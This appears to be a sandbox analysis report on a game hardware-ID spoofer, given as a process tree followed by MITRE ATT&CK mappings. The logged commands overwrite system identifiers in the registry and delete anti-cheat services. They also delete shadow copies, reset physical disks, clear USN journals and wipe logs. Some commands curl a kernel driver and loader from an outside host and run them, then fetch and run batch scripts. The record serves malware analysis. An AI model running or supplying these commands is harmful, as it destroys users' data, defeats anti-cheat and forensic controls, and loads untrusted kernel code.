    REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 297082794-2827224685-1381828469 /f
    3⤵
    - Modifies registry key
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3100
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 297082794-2827224685-1381828469 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:836
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 297082794-2827224685-1381828469 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
  2⤵
  PID:3296
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {297082794-2827224685-1381828469} /f
    3⤵
    - Modifies registry key
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:4328
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 297082794-2827224685-1381828469 /f
    3⤵
    - Modifies registry key
    PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:3104
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 297082794-2827224685-1381828469 /f
    3⤵
    - Modifies registry key
    PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d%Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:4348
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:116
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
  2⤵
  PID:3668
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2228
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2788
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:4236
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 2971113542-1336815980-2413332396 /f
    3⤵
    - Modifies registry key
    PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:220
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Modifies registry key
    PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3384
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:2952
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:952
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:4648
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:3568
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:1888
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2971424291-312327276-16793555 /f
    3⤵
    - Modifies registry key
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
  2⤵
  PID:388
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 297182271-1632831339-119947481 /f
    3⤵
    - Modifies registry key
    PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
  2⤵
  PID:1708
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {297182271-1632831339-119947481} /f
    3⤵
    - Modifies registry key
    PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
  2⤵
  PID:4760
- - C:\Windows\system32\reg.exe
    REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {297182271-1632831339-119947481} /f
    3⤵
    - Modifies registry key
    PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\MountedDevices /f
  2⤵
  PID:3092
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
  2⤵
  PID:1428
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
  2⤵
  PID:716
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
  2⤵
  PID:3184
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    - Modifies registry key
    PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
  2⤵
  PID:2688
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
  2⤵
  PID:4256
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    - Modifies registry key
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
  2⤵
  PID:3936
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
  2⤵
  PID:3980
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    - Modifies registry key
    PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
  2⤵
  PID:3388
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    - Modifies registry key
    PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
  2⤵
  PID:3056
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
  2⤵
  PID:1204
- - C:\Windows\system32\reg.exe
    REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe C: B601-EDCB
  2⤵
  PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe D: 3D42-DFFB
  2⤵
  PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe E: D836-645A
  2⤵
  PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe F: 26D6-F399
  2⤵
  PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /SU AUTO >nul
  2⤵
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /SS %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /BS %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /CS %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:3920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /CS %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /CS %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /PSN %Random%%Random%-%Random%%Random%-%Random%%Random% >nul
  2⤵
  PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop winmgmt >nul
  2⤵
  PID:1964
- - C:\Windows\system32\sc.exe
    sc stop winmgmt
    3⤵
    - Launches sc.exe
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start winmgmt >nul
  2⤵
  PID:4400
- - C:\Windows\system32\sc.exe
    sc start winmgmt
    3⤵
    - Launches sc.exe
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop winmgmt /y >nul
  2⤵
  PID:3564
- - C:\Windows\system32\net.exe
    net stop winmgmt /y
    3⤵
    PID:2732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop winmgmt /y
      4⤵
      PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
  2⤵
  PID:4732
- - C:\Windows\system32\net.exe
    net start winmgmt /y
    3⤵
    PID:3700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start winmgmt /y
      4⤵
      PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
  2⤵
  PID:1412
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:3788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int reset all >nul
  2⤵
  PID:836
- - C:\Windows\system32\netsh.exe
    netsh int reset all
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
  2⤵
  PID:4844
- - C:\Windows\system32\netsh.exe
    netsh int ipv4 reset
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
  2⤵
  PID:3936
- - C:\Windows\system32\netsh.exe
    netsh int ipv6 reset
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
  2⤵
  PID:432
- - C:\Windows\system32\netsh.exe
    netsh winsock reset
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
  2⤵
  PID:4528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell vssadmin delete shadows /all
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2996
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all
      4⤵
      Interacts with shadow copies
      PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
  2⤵
  PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Reset-PhysicalDisk *
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
  2⤵
  PID:3568
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n C:
    3⤵
    PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
  2⤵
  PID:1444
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n D:
    3⤵
    - Enumerates connected drives
    PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
  2⤵
  PID:1716
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n E:
    3⤵
    - Enumerates connected drives
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
  2⤵
  PID:3416
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n F:
    3⤵
    - Enumerates connected drives
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
  2⤵
  PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
  2⤵
  PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
  2⤵
  PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
  2⤵
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
  2⤵
  PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
  2⤵
  PID:704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\shutdown /r /t 100
  2⤵
  PID:2572
- - C:\Windows\System32\shutdown.exe
    C:\Windows\System32\shutdown /r /t 100
    3⤵
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl http://zerocdn.com/706228715/hwidspoofer.sys --output C:\Windows\IME\hwidspoofer.sys >nul 2>&1
  2⤵
  PID:3752
- - C:\Windows\system32\curl.exe
    curl http://zerocdn.com/706228715/hwidspoofer.sys --output C:\Windows\IME\hwidspoofer.sys
    3⤵
    - Drops file in Windows directory
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl http://zerocdn.com/706228723/kdmapper.exe --output C:\Windows\IME\kdmapper.exe >nul 2>&1
  2⤵
  PID:1748
- - C:\Windows\system32\curl.exe
    curl http://zerocdn.com/706228723/kdmapper.exe --output C:\Windows\IME\kdmapper.exe
    3⤵
    - Drops file in Windows directory
    PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\IME\kdmapper.exe C:\Windows\IME\hwidspoofer.sys
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\IME\hwidspoofer.sys
  2⤵
  PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\IME\kdmapper.exe
  2⤵
  PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent http://zerocdn.com/705746441/FortniteCleaner.bat --output C:\Windows\GameBarPresenceWriter\FortniteCleaner.bat >nul
  2⤵
  PID:3628
- - C:\Windows\system32\curl.exe
    curl --silent http://zerocdn.com/705746441/FortniteCleaner.bat --output C:\Windows\GameBarPresenceWriter\FortniteCleaner.bat
    3⤵
    - Drops file in Windows directory
    PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent http://zerocdn.com/706600358/valo1.bat --output C:\Windows\GameBarPresenceWriter\valo1.bat >nul
  2⤵
  PID:3968
- - C:\Windows\system32\curl.exe
    curl --silent http://zerocdn.com/706600358/valo1.bat --output C:\Windows\GameBarPresenceWriter\valo1.bat
    3⤵
    - Drops file in Windows directory
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent http://zerocdn.com/706600361/valo2.bat --output C:\Windows\GameBarPresenceWriter\valo2.bat >nul
  2⤵
  PID:2492
- - C:\Windows\system32\curl.exe
    curl --silent http://zerocdn.com/706600361/valo2.bat --output C:\Windows\GameBarPresenceWriter\valo2.bat
    3⤵
    - Drops file in Windows directory
    PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\FortniteCleaner.bat >nul
  2⤵
  PID:804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\valo1.bat >nul
  2⤵
  PID:4704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\valo2.bat >nul
  2⤵
  PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\FortniteCleaner.bat >nul
  2⤵
  PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\valo1.bat >nul
  2⤵
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\valo2.bat >nul
  2⤵
  PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:716

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Direct Volume Access

T1006

